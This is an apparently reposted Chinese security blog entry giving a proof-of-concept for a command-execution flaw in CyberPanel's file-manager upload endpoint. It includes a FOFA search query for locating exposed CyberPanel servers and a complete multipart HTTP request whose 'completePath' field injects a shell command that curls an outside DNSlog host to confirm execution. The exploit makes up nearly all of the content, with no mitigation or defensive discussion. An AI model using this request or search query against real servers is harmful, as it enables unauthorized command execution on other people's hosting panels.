CyberPanel开源Web控制面板 upload 命令执行漏洞复现及POC

CatalyzeSec2024-11-09 9:51

FOFA

复制代码

app="CyberPanel"

POC

复制代码

POST /filemanager/upload HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: multipart/form-data; boundary=----NewBoundary123456789
Content-Length: 338

------NewBoundary123456789
Content-Disposition: form-data; name="domainName"

<target>
------NewBoundary123456789
Content-Disposition: form-data; name="completePath"

curl http://DNSlog地址/
------NewBoundary123456789
Content-Disposition: form-data; name="file"; filename="poc.txt"

pwn
------NewBoundary123456789--

漏洞复现

本文是转载文章，点击查看原文

如有侵权，请联系 xyy@jishuzhan.net 删除

上一篇：VUE项目是如何启动的

下一篇：vue之组件网站（后续补）